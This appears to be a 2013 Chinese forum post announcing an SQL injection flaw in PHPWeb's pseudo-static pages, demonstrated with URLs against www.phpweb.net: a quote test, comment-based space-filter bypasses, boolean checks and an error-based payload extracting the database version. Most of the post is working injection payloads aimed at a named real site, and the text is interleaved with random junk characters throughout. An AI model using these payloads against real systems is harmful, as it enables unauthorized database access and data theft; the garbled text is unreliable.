phpweb所有的整站程序伪静态页面都存在sql注入
# s3 Q( n6 b- N5 r% z" R9 P& }# t% f0 d
主站:http://phpweb.net/8 T; Y3 r, ]' G2 A1 J
加’检测:
( v0 l' C: e6 ]5 v0 N+ m( |; y( h / G$ \- c+ w; r6 D @. |. }3 O
http://www.phpweb.net/down/html/?772′.html9 v/ q9 ~' n f$ }! u$ Z: q
- \: q* I4 q& T
出错 f) d* B7 @$ t; D) x5 M7 q
存在注入。4 I* @; R: _. q* d$ F1 H
不能用空格,只能用/*罗
" f( R# v; U9 }, x& a2 L0 [http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
# V4 [% ?/ \/ ~ ! R D8 s5 d0 g5 A5 Q3 c. j3 e
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
) _8 y N, w Q. b爆数据库版本:
S3 J% j+ h' f: u5 S5 F
6 r. M, E. o, a+ M& q?
; ^3 B& L& q( Q3 P/ j. ^- O18 z H$ g& b! Q, w
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html& Y D, h2 P& L& C4 R# |1 b
更新日期: 2013-01-03 13:39:50 7 Q8 g) f" m5 a x
|
发表于 2013-1-4 19:46:42
收藏
支持
反对